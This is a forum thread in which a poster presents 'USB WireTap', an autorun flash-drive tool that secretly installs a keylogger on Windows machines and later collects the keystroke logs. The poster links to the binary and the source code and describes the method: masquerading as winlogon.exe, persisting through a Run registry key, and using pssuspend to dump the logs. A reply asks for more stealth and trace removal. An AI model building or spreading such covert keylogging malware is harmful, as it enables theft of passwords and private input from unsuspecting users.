USB WireTap

[davidork]

Check it out

For non u3 flash  drives

Runs on 2k/xp/and possibly vista

plugin the flashdrive, wait for autorun to kick in, click wiretap  the computer logs installs a stealth keylogger and logs out.

on the next login the keylogger starts running.

come back later, plugin the flashdrive, wait for autorun to kick in, cilck wiretap again, you get a prompt from pssuspend asking you to agree to a EULA (had to use sysinternals pssuspend to pause the keylogger process, to prevent it from throwing an error when the keyloggers log is dumped)  and it dumps the keyloggers log to the flash drive.

for now the log only contains the keystrokes from the current login,  but i've got a pretty good idea for the fix, but wont add it until the next release (v 2. 0)

it aint perfect, but it'll get the job done.

you can get the files at hxxp: davidork. googlepages. com/usbwt. zip and the source code at hxxp: davidork. googlepages. com/usbwt-src. zip

Honestly, i dont know if there will be a 2.0 it was just a "lets see if we can pull this off"  proof of concept type thing

but if there is another release

plans for 2. 0 

installs a system service (instead of a HKLM>software>microsoft>windows>currentversion>run registry entry)

wont require  pssuspend to dump logs

will log more than the current login

neater install/dump process

artwork?

but for those of you who are curious as to what this is but dont want to download ill cover the basics of whats going on.

on the first insertion, it checks to see if the keylogger is allready installed

if not, it installs it, by copys the keylogger to c:/windows/winlogon.exe

the naming here is important, it has the same image name as a vital system process thus you cant close it.

it patches itself into the registry to run at start up  HKLM>software>microsoft>windows>currentversion>run>c:windowswinlogon.exe

then runs shutdown -l  to logout, and on then next login the keylogger kicks in and starts logging to c:windowssetup.dat

on the second insertion, it checks again to see if its installed if it is

it then runs pssuspend to pause the keylogger (to prevent a file in use error)

copies the  log off onto the flash drive

then unsuspends the keylogger.

if you download it and try it... heres removal instructions

dont try to kill it with task manager (it wont let you)  and you can use a little tool from sysinternals called pskill to kill it, however being that it has the same name as a windows process (winlogon.exe)  doing so causes an instant bluescreen.

start>run>type regedit > hit enter > navigate to HKLM>SOFTWARE>MICROSOFT>WINDOWS>CURRENTVERSION> and delete c:windowswinlogon.exe

then logout.

log back in (this effectively kills the keylogger without a bluescreen)

then delete c:windowswinlogon.exe and c:windowssetup.dat

[bloodsplat]

Is there anyway to get the key logger to start when a certain application opens or a process starts and only run for a couple of minutes?

You should include a program that auto removes any traces of the keylogger like the registry entry or even just have an option where the key logger only works when the usb is connected to the compand runs straight from the usb. would be very helpful if trying to be stealthy